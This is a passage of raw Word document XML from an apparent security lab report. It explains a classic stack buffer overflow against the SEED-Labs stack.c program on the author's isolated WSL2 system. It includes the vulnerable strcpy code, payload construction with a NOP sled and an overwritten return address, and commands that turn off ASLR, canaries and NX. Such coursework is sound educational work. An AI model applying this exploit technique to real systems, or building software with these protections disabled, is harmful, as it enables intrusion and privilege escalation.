        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295528 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77405122" w14:textId="3B232A89" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Part 3 - Red Team Engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295529 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79757B96" w14:textId="265F3CCD" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.1  Scope and rules of engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295530 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B131B9C" w14:textId="232FB151" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.2  Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295531 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716FBBA" w14:textId="0C48565B" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.3  Scanning and enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295532 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C3D00E" w14:textId="124D229E" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.4  Exploitation (initial access)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295533 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E119FD9" w14:textId="0DF2A22B" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.5  Privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295534 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E1DD9" w14:textId="3D5E9F94" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.6  Post-exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295535 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="353BFBC1" w14:textId="56E89EB8" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.7  Reporting and remediation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295536 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE377F3" w14:textId="5935E07F" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A3AF7" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5FCA5" w14:textId="6D24E560" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc242295511"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 1 - Stack-Based Buffer Overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4F392F87" w14:textId="5FE11D9D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc242295512"/>
      <w:r>
        <w:t>1.1  Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7FFE0C4B" w14:textId="0F5E8ABB" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The task is to exploit a deliberately vulnerable C program (stack.c) using a classic stack-based buffer overflow: overflow a fixed-size local buffer, overwrite the saved return address on the stack, and redirect execution into attacker-supplied shellcode that launches a shell. All work was performed on an isolated Ubuntu system running under WSL2 that I own, with modern memory protections deliberately disabled for the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD220B" w14:textId="2D9FF6AF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc242295513"/>
      <w:r>
        <w:t>1.2  Why the program is vulnerable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="38B8D3CE" w14:textId="25A24AFF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The vulnerable function copies attacker-controlled data into a 12-byte stack buffer using strcpy(), which performs no bounds checking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221D3AE3" w14:textId="4E3F7CC5" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int bof(char *str) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    char buffer[12];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    strcpy(buffer, str);   // BUG: no bounds check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return 1;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>int main() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    char str[517];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    FILE *badfile = fopen("badfile", "r");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    fread(str, sizeof(char), 517, badfile);   // up to 517 attacker bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    bof(str);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    printf("Returned Properly\n");            // never prints if hijacked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC3B13" w14:textId="0A3BE638" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>strcpy() keeps copying until it reaches a NUL byte. Because main() hands bof() up to 517 bytes read straight from badfile, the copy runs past the end of the 12-byte buffer and overwrites, in order: the buffer, the saved frame pointer (RBP), and the saved return address. Whoever controls the saved return address controls where the CPU jumps when bof() executes its ret instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71096475" w14:textId="105FC1BC" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc242295514"/>
      <w:r>
        <w:t>1.3  Stack layout and payload design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="18136F39" w14:textId="3C9E9408" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The stack grows downward, but strcpy() writes upward from the start of the buffer, which is exactly what lets a forward copy clobber the return address sitting above the buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08F5A0" w14:textId="02F29ED1" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  higher addresses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  |  saved RETURN ADDRESS (8B) |  payload offset 20..27   &lt;= overwritten</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+        with an address inside the NOP sled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  |  saved RBP            (8B) |  payload offset 12..19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  |  buffer[12]               |  payload offset 0..11    &lt;= strcpy starts here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  +----------------------------+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  lower addresses     (strcpy writes upward, toward the return address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521EF58F" w14:textId="2FC24340" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The 517-byte payload (badfile) is filled entirely with NOP (0x90) instructions, the shellcode is placed near the end, and the saved return address at offset 20 is overwritten with an address that lands somewhere inside the NOP sled. A wide sled means precise addressing is not required: execution lands in the sled and slides down into the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CD324" w14:textId="2E76B24B" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>memset(buffer, 0x90, 517);                 // (1) NOP sled over the whole payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>int start = 517 - sizeof(shellcode) - 10;  // (2) shellcode near the end (offset 480)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>memcpy(buffer + start, shellcode, sizeof(shellcode) - 1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>*(unsigned long *)(buffer + 20) = 0x7fffffffe594;  // (3) overwrite return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C780CF8" w14:textId="54967DAE" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The shellcode is the standard SEED-Labs x86-64 execve("/bin/sh") stub; the learning objective of this task is the stack-layout and offset reasoning, so the shellcode is treated as an opaque, provided payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C8920" w14:textId="5B6533C4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc242295515"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.4  Disabling protections (lab only)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="450E0B20" w14:textId="46CD93E8" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The vulnerable program is compiled with the three defenses that normally stop this class of attack switched off, and ASLR is disabled so stack addresses are stable between runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B61F79" w14:textId="3D988A6F" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>gcc -g -fno-stack-protector -z execstack -no-pie -o stack stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>gcc -o exploit exploit.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>./exploit      # writes ./badfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>./stack        # overflow -&gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D782EE" w14:textId="77C6BDD9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Each disabled defense maps to a real-world protection: -fno-stack-protector removes the stack canary (StackGuard); -z execstack makes the stack executable, defeating NX/DEP; -no-pie fixes the load address, standing in for PIE + ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022B54FE" w14:textId="536839E3" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc242295516"/>
      <w:r>
        <w:t>1.5  Execution and proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="670B33DA" w14:textId="33D12523" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>Running the exploit end-to-end compiles the target, builds the 517-byte payload, and launches ./stack. The overflow redirects execution through the NOP sled into execve("/bin/sh"), spawning a shell that executes the commands fed to it (id, whoami, uname):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B53650" w14:textId="13F095A9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FAA42FF" wp14:editId="36FCDC6F">
            <wp:extent cx="5715000" cy="3571717"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10160"/>
            <wp:docPr id="123477753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4777536" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CAC2B4" w14:textId="549C3E78" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 1.1 - The exploit running in WSL2 (Ubuntu). id returns uid=0(root), confirming a shell was spawned via the hijacked return address. "Returned Properly" never prints, proving control flow was taken over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136742BE" w14:textId="4A1C5D2C" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:r>
        <w:t>The decisive evidence is twofold: id inside the spawned shell returns uid=0(root), and the line "Returned Properly" from main() never appears. If the overflow had failed, bof() would have returned normally and that line would have printed. A full timestamped text log of the same run is provided in report/screenshots/evidence-part1-wsl-exploit.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8B6452" w14:textId="30947A2D" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc242295517"/>
      <w:r>
